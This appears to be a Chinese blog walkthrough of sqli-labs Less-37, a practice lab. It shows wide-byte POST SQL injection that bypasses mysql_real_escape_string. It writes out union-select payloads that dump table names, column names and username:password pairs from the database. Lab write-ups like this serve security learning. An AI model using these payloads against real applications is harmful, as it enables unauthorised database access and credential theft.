Sqli-labs之Less-37

                                               Less-37

POST型 - 绕过 MYSQL_real_escape_string

Sqli-labs之Less-37_第1张图片

本关与 34 关是大致相似的,区别在于处理 post 内容用的是 mysql_real_escape_string()
函数,而不是 addslashes()函数,但是原理是一直的,

Sqli-labs之Less-37_第2张图片

查看源码,得知只是本关只是将Less-34过滤函数进行了替换: mysql_real_escape_string(),我们可以直接按照34关的方法即可

1.万能密码注入:

Sqli-labs之Less-37_第3张图片

发现和36关一样的问题:

Sqli-labs之Less-37_第4张图片

别人都成功了:

Sqli-labs之Less-37_第5张图片

利用burpsuite试试:

Sqli-labs之Less-37_第6张图片

也不可以,真高级能转义一个字节,搞不明白,这个函数就没这功能,别人都可以成功

而且还能这样:(真是牛批,两个反斜杠不是转义自身吗?这都不能成功,服了)(猜测造成这样的结果应该与我搭建的服务器有关,以后解决。。)

Sqli-labs之Less-37_第7张图片

 

这里展示别人成功的例子:

暴位置

 uname=-admin%E3' union select 1,2 --+&passwd=admin&submit=Submit

 Sqli-labs之Less-37_第8张图片

 

 

暴表

uname=-admin%E3' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() --+&passwd=admin&submit=Submit

 Sqli-labs之Less-37_第9张图片

 

 

暴字段

uname=-admin%E3' union select 1,group_concat(column_name) from information_schema.columns where table_name=0x7573657273 --+&passwd=admin&submit=Submit

 Sqli-labs之Less-37_第10张图片

 

 

暴值

uname=-admin%E3' union select 1,group_concat(username,0x3a,password) from users --+&passwd=admin&submit=Submit

 Sqli-labs之Less-37_第11张图片

至此,Page-2 (Advanced Injections)的过滤绕过部分已经完成。

你可能感兴趣的:(Sqli-labs之Less-37)